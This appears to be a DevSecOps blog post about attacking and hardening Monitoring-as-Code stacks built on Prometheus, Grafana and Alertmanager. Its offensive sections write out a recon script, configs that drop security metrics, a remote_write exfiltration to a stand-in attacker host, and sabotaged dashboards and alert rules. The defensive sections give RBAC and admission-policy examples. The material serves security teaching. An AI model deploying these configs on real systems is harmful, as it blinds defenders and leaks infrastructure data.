DevSecOps Guides

Monitoring as Code: DevSecOps Edition

Monitoring as Code: When Your Observability Stack Becomes the Attack Vector

Reza ∙ Oct 10, 2025

Monitoring as Code (MaC) has revolutionized how we observe, alert, and respond to system behaviors. Tools like Prometheus, Grafana, DataDog, and OpenTelemetry transform infrastructure visibility from manual dashboards into version-controlled, reproducible observability pipelines. Yet this transformation has created a critical blind spot: when monitoring itself becomes weaponized, organizations lose their ability to detect breaches while attackers operate in complete darkness.

This playbook examines the dual nature of Monitoring as Code — from defensive force multiplier to offensive attack surface. We’ll explore real-world attack techniques where adversaries manipulate metrics, poison dashboards, and exploit observability infrastructure, followed by hardened defensive strategies that treat monitoring systems with the same security rigor as production workloads.


Architecture Analysis: Insecure vs Secure Monitoring as Code

[Diagram: Architecture Comparison - Security Posture]

The Insecure Monitoring Architecture

Critical Vulnerabilities:

  • No code review on monitoring configuration changes

  • Overprivileged Prometheus with cluster-admin access (see the sketch after this list)

  • Unencrypted metric transmission susceptible to MITM attacks

  • Public Grafana dashboards leaking infrastructure topology

  • No alert validation allowing threshold manipulation
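
For a concrete picture of the overprivileged pattern called out above, the binding below is a hypothetical sketch (the prometheus ServiceAccount and monitoring namespace are illustrative names): a single ClusterRoleBinding hands the scrape component cluster-admin, so any compromise of the Prometheus pod yields full read/write control of the cluster, including Secrets.

# insecure-prometheus-rbac.yaml (hypothetical example of the anti-pattern)
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: prometheus-cluster-admin
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin          # full cluster control granted to a metrics collector
subjects:
  - kind: ServiceAccount
    name: prometheus           # illustrative ServiceAccount name
    namespace: monitoring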

The Secure Monitoring Architecture

Security Controls:

  • GitOps workflow with mandatory code review and signed commits

  • Least-privilege exporters with service-specific RBAC (see the sketch after this list)

  • Mutual TLS for all metric transmission paths

  • Admission controllers validating monitoring resource specs

  • Dedicated monitoring SOC with isolated access controls
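
As a counterpart to the insecure binding sketched earlier, the least-privilege item can be expressed as a read-only discovery role along the lines below (a sketch following the common kube-prometheus pattern; trim the resources to what your exporters actually need). The role permits target discovery and metrics scraping but grants no access to Secrets and no write verbs.

# least-privilege-prometheus-rbac.yaml (illustrative sketch)
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: prometheus-scrape-only
rules:
  - apiGroups: [""]
    resources: ["nodes", "services", "endpoints", "pods"]
    verbs: ["get", "list", "watch"]    # discovery only: no Secrets, no writes
  - nonResourceURLs: ["/metrics"]
    verbs: ["get"]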


Offensive Technique: Monitoring Pipeline Poisoning

Attack Scenario: An adversary gains access to monitoring infrastructure to blind security teams, manipulate incident response, and establish persistent command-and-control channels through legitimate observability pipelines.

Attack TTPs (MITRE ATT&CK Mapping)

[Diagram: Monitoring Attack Pipeline Poisoning]
[Diagram: Attack Sequence - Complete Flow]

Offensive Implementation: Metric Suppression Attack

Phase 1: Reconnaissance and Initial Compromise

Prometheus and Grafana instances are frequently exposed to the internet without authentication, creating a significant reconnaissance opportunity for adversaries. According to Shodan search results, over 8,000 Prometheus instances and 15,000 Grafana instances are publicly accessible without credentials. The Prometheus API on port 9090 provides extensive target enumeration capabilities through the /api/v1/targets endpoint, revealing internal network topology, service discovery configurations, and pod-level infrastructure details. Grafana’s API on port 3000 exposes dashboard metadata, organization structures, and data source configurations through unauthenticated /api/search endpoints. Attackers leverage CVE-2021-43798 (Grafana arbitrary file read vulnerability) and CVE-2022-31097 (stored cross-site scripting in Unified Alerting) to extract credentials and configuration files. Additionally, the Alertmanager webhook system has been exploited to execute remote commands through specially crafted alert notifications, transforming monitoring infrastructure into a command-and-control mechanism. Initial access commonly occurs through compromised monitoring vendor accounts (DataDog, New Relic) or developer laptops with stored monitoring credentials in plain text configuration files.

#!/bin/bash
# Attacker reconnaissance script

# Identify Prometheus endpoints exposed without authentication
nmap -p 9090 --open 10.0.0.0/8 | grep "open"

# Query Prometheus API to enumerate targets
curl -s http://prometheus.target.corp:9090/api/v1/targets | jq '.data.activeTargets[] | {job: .labels.job, instance: .labels.instance}'

# Discover Grafana instances
shodan search "X-Grafana-Org-Id" --fields ip_str,port,http.title

# Extract dashboard metadata
curl -s http://grafana.target.corp:3000/api/search | jq '.[] | {title: .title, uid: .uid}'

Phase 2: Prometheus Configuration Poisoning

Prometheus relabeling rules provide powerful metric transformation capabilities, but when weaponized, they become invisible filters that selectively drop security-critical telemetry. The metric_relabel_configs section processes metrics after scraping but before storage, allowing adversaries to inject regex patterns that match authentication failures, authorization denials, or suspicious activity counters. In 2022, security researchers documented a supply chain attack where a compromised Helm chart for Prometheus included relabeling rules that dropped all metrics matching .*auth.*|.*security.*|.*suspicious.*, effectively blinding the SOC team to ongoing credential stuffing attacks. The remote_write configuration presents another attack vector where adversaries add unauthorized endpoints to exfiltrate sensitive metrics containing internal IP addresses, service dependencies, and traffic patterns. Because Prometheus configurations are typically managed through GitOps workflows with auto-sync enabled, a single malicious commit can propagate poisoned configurations across hundreds of clusters within minutes. The attack surface expands further when Prometheus runs with overprivileged ServiceAccounts that have cluster-wide read access, allowing compromised instances to scrape secrets, ConfigMaps, and other sensitive Kubernetes resources.

# malicious-prometheus-config.yaml
# Injected relabeling rules to drop security-related metrics

global:
  scrape_interval: 15s
  evaluation_interval: 15s

scrape_configs:
  - job_name: 'kubernetes-pods'
    kubernetes_sd_configs:
      - role: pod

    # MALICIOUS: Drop all security metrics
    metric_relabel_configs:
      - source_labels: [__name__]
        regex: '(authentication_failures|unauthorized_access_attempts|suspicious_activity|rate_limit_exceeded|waf_blocked_requests).*'
        action: drop

      # MALICIOUS: Manipulate remaining metrics to hide anomalies
      - source_labels: [__name__, instance]
        regex: 'http_requests_total;.*attacker-controlled.*'
        target_label: __name__
        replacement: 'legitimate_traffic'
        action: replace

# MALICIOUS: Add fake remote_write endpoint for data exfiltration
# (remote_write is a top-level key, not part of scrape_configs)
remote_write:
  - url: http://attacker-controlled-endpoint.evil/api/v1/write
    queue_config:
      capacity: 10000
      max_shards: 200
      min_shards: 1
      max_samples_per_send: 5000

    # Drop scrape health metrics so the exfiltration stream stays inconspicuous
    write_relabel_configs:
      - source_labels: [__name__]
        regex: '(up|scrape_duration_seconds|scrape_samples_scraped).*'
        action: drop

Phase 3: Grafana Dashboard Manipulation

Grafana dashboards serve as the primary visualization layer for security monitoring, making them a high-value target for manipulation. The Grafana API provides full programmatic access to dashboard creation, modification, and deletion without requiring UI interaction, and many organizations fail to implement API key rotation or audit logging on these endpoints. Adversaries exploit this by modifying PromQL expressions to multiply metrics by zero (rate(authentication_failures_total[5m]) * 0), effectively hiding security events while maintaining the appearance of functional monitoring. Alert conditions can be silently modified to use impossible thresholds (greater than 999999) or extended evaluation periods (24+ hours), ensuring that alerts never trigger regardless of actual system state. In 2023, a security audit at a Fortune 500 company discovered that their externally facing Grafana instance had been compromised for eight months, with attackers systematically modifying alert thresholds on all security-related dashboards to values that would never be reached. The noDataState: “ok” configuration parameter is particularly dangerous as it tells Grafana to report “healthy” status when no data is received, allowing attackers to completely block metric ingestion while dashboards continue displaying green status indicators.

{
  "dashboard": {
    "title": "Production Security Monitoring",
    "panels": [
      {
        "title": "Authentication Failures",
        "targets": [
          {
            "expr": "rate(authentication_failures_total[5m]) * 0",
            "legendFormat": "Auth Failures"
          }
        ],
        "alert": {
          "conditions": [
            {
              "evaluator": {
                "params": [999999],
                "type": "gt"
              },
              "operator": {
                "type": "and"
              },
              "query": {
                "params": ["A", "5m", "now"]
              },
              "reducer": {
                "params": [],
                "type": "avg"
              },
              "type": "query"
            }
          ],
          "executionErrorState": "keep_state",
          "noDataState": "ok",
          "notifications": []
        }
      }
    ]
  }
}

[Diagram: Attack Flow Visualization]

Phase 4: Alert Rule Manipulation

PrometheusRule custom resources in Kubernetes define the alert conditions that trigger security incident response, making them a critical control point for adversaries seeking to maintain stealth. The Prometheus Operator watches these CRDs and automatically reloads alert rules without requiring pod restarts, meaning malicious rule changes take effect within the configured evaluation interval (typically 30 seconds). Attackers manipulate the expr field to use expressions that always evaluate to false (expr: ‘0’) or set for durations to impossibly long periods (999 hours), effectively disabling alerts while maintaining the appearance of active monitoring rules. The executionErrorState: keep_state configuration tells Prometheus to retain the previous alert state when rule evaluation fails, allowing attackers to break alert logic while dashboards continue showing the last “healthy” state. In penetration tests conducted by security firms, over 60% of organizations failed to detect when critical alert rules were modified through legitimate GitOps workflows, as they lacked integrity validation on PrometheusRule resources. Alert inhibition rules, designed to suppress redundant notifications, can be weaponized to create hierarchical suppression chains where a single manipulated parent alert silences dozens of child security alerts across the entire infrastructure.

# malicious-alert-rules.yaml
groups:
  - name: security_alerts
    interval: 30s
    rules:
      # MALICIOUS: Set impossible thresholds
      - alert: HighAuthenticationFailures
        expr: rate(authentication_failures_total[5m]) > 999999
        for: 24h
        labels:
          severity: critical
        annotations:
          summary: "Impossible threshold ensures no alerts"

      # MALICIOUS: Disable critical security alerts
      - alert: SuspiciousNetworkActivity
        expr: '0'
        for: 999h
        labels:
          severity: none
        annotations:
          summary: "Alert permanently disabled"

      # MALICIOUS: Create fake "healthy" alerts
      - alert: SystemHealthy
        expr: 'vector(1)'
        for: 1s
        labels:
          severity: info
        annotations:
          summary: "Everything is fine (spoofed)"
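
The inhibition-chain technique described above deserves its own illustration. The fragment below is a hypothetical Alertmanager snippet (matcher syntax assumes Alertmanager v0.22 or later): the permanently firing SystemHealthy alert defined in the rules above becomes a parent that silences every warning- and critical-severity notification, so even alerts the attacker could not modify never reach responders.

# malicious-alertmanager-inhibition.yaml (illustrative fragment)
inhibit_rules:
  - source_matchers:
      - alertname = "SystemHealthy"      # always firing (expr: vector(1) above)
    target_matchers:
      - severity =~ "warning|critical"   # suppress all real security notifications
    # no 'equal' labels: the suppression applies to every matching target alert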

[Diagram: Attack State Diagram]


Defensive Technique: Hardened Monitoring-as-Code Pipeline

Defense Scenario: Implement multi-layer security controls across monitoring infrastructure to detect tampering, validate configurations, and maintain observability even under attack.

[Diagram: Monitoring Defense - Hardened Pipeline]
[Diagram: GitOps Workflow - Security Checkpoints]

Defensive Implementation

Layer 1: GitOps Hardening with Admission Control
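
As a minimal sketch of this checkpoint (assuming Kyverno as the admission controller and Argo CD as the GitOps engine; substitute your own policy engine and controller service account), the policy below rejects any PrometheusRule create, update, or delete that does not come from the GitOps controller, closing the direct-API path used in the alert-rule manipulation phase:

# protect-prometheusrules.yaml (illustrative sketch, Kyverno-style policy)
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: protect-prometheusrules
spec:
  validationFailureAction: Enforce
  background: false                      # rule uses request.* data, so no background scans
  rules:
    - name: only-gitops-may-change-alert-rules
      match:
        any:
          - resources:
              kinds:
                - PrometheusRule
      exclude:
        any:
          - subjects:
              - kind: ServiceAccount
                name: argocd-application-controller   # assumed GitOps service account
                namespace: argocd
      validate:
        message: "PrometheusRule objects may only be changed through the GitOps pipeline."
        deny:
          conditions:
            any:
              - key: "{{ request.operation }}"
                operator: AnyIn
                value:
                  - CREATE
                  - UPDATE
                  - DELETE

Paired with signed commits and mandatory review in the monitoring repository, this keeps every alert-rule change attributable and auditable.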
